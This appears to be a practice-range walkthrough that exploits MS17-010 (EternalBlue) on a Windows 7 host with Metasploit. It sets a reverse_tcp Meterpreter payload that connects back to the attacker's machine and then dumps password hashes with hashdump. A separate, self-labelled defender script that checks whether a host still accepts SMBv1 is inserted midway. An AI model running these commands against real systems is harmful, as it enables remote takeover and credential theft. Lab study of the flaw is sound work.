Vulnerability introduction
The MS17-010 vulnerability lies in the kernel-mode function srv!SrvOs2FeaListToNt of the Windows SMBv1 driver, which converts FEA (File Extended Attributes) lists; the flaw is a buffer overflow in the large non-paged kernel pool.
Before srv!SrvOs2FeaListToNt converts the FEA list into an NTFEA (Windows NT FEA) list, srv!SrvOs2FeaListSizeToNt is called to calculate the size of the converted list. That size is calculated incorrectly, so the buffer allocated for the NTFEA list is too small and the conversion overflows it.
Lab environment
Here I use the practice range provided by Anjie.com
Machine | IP address
---|---
Attacker machine | 192.168.0.3
Windows 7 (target) | 192.168.0.2
Exploit
Open nmap to scan the target machine
nmap -sV -Pn 192.168.0.2
The target machine has ports 135, 139 and 445 open, and the operating system is Windows 7.
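The scan shows port 445 open but does not say whether the host still accepts SMBv1, the protocol family MS17-010 lives in. The following script is an added example, not part of the original walkthrough: it sends a single SMB1 NEGOTIATE offering the NT LM 0.12 dialect and reports whether the server accepts it, which is the check a defender runs over the hosts they administer to find those that still need SMBv1 disabled. The host address, port and timeout are assumptions.

```python
import socket
import struct

# Added example (not from the original walkthrough). Defender-side check:
# does this host still speak SMBv1, the protocol family MS17-010 lives in?
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
HEADER_FMT = "<4sBIBHH8sHHHHH"       # 32-byte SMB1 header, little-endian
DIALECT = b"\x02NT LM 0.12\x00"       # one dialect entry: 0x02 + NUL-terminated name


def build_negotiate() -> bytes:
    """NetBIOS session header + SMB1 header + NEGOTIATE body (WordCount 0)."""
    header = struct.pack(HEADER_FMT, SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18,
                         0xC853, 0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)
    body = struct.pack("<BH", 0, len(DIALECT)) + DIALECT
    pdu = header + body
    return b"\x00" + len(pdu).to_bytes(3, "big") + pdu   # type 0 = session message


def parse_negotiate_response(data: bytes) -> dict:
    """Decide whether the reply is a successful SMB1 NEGOTIATE response."""
    if len(data) < 39 or data[4:8] != SMB_MAGIC:
        return {"smb1": False, "reason": "not an SMB1 reply"}
    fields = struct.unpack(HEADER_FMT, data[4:36])
    command, status = fields[1], fields[2]
    word_count = data[36]
    # DialectIndex 0xFFFF means "none of the offered dialects accepted".
    dialect_index = struct.unpack("<H", data[37:39])[0] if word_count else 0xFFFF
    accepted = command == SMB_COM_NEGOTIATE and status == 0 and dialect_index != 0xFFFF
    return {"smb1": accepted, "status": status, "dialect_index": dialect_index}


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Connect, send one NEGOTIATE, and classify the reply (or lack of one)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            data = s.recv(1024)
    except OSError as exc:          # refused, reset or timed out
        return {"smb1": False, "reason": str(exc)}
    if not data:                    # server hung up: SMBv1 is disabled there
        return {"smb1": False, "reason": "connection closed without a reply"}
    return parse_negotiate_response(data)


if __name__ == "__main__":
    # Lab target from the walkthrough; replace with the hosts you administer.
    print(probe_smb1("192.168.0.2"))
```

A host that closes the connection or answers with DialectIndex 0xFFFF no longer speaks SMBv1; a host that answers with status 0 still does and is worth checking for the MS17-010 fix.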
Then we open msf
msfconsole
This opens the Metasploit command-line console. Use the search command to find the modules related to the ms17-010 vulnerability
search ms17-010
Since the EternalBlue module matches our target, we can use it directly
use exploit/windows/smb/ms17_010_eternalblue
View the module options and set every option whose Required column is yes
show options
Set the IP address of the target machine
set RHOSTS 192.168.0.2
Next, select the payload (the shellcode that runs on the target); here we choose a reverse TCP Meterpreter payload that connects back to our console
set payload windows/x64/meterpreter/reverse_tcp
The payload also needs to be configured; show options shows that the local host LHOST is still missing, so set it
set LHOST 192.168.0.3
After completing the configuration, type exploit or run to execute the exploit module
run
A session on the target host is obtained successfully.
With the session open, we continue with other features Meterpreter offers during post-exploitation.
Run sysinfo to view information about the target machine.
sysinfo
Running the help command lists the functions Meterpreter provides
help
Next, we dump the password hashes of the target machine by executing hashdump
hashdump
Summary
Another simple and fulfilling day!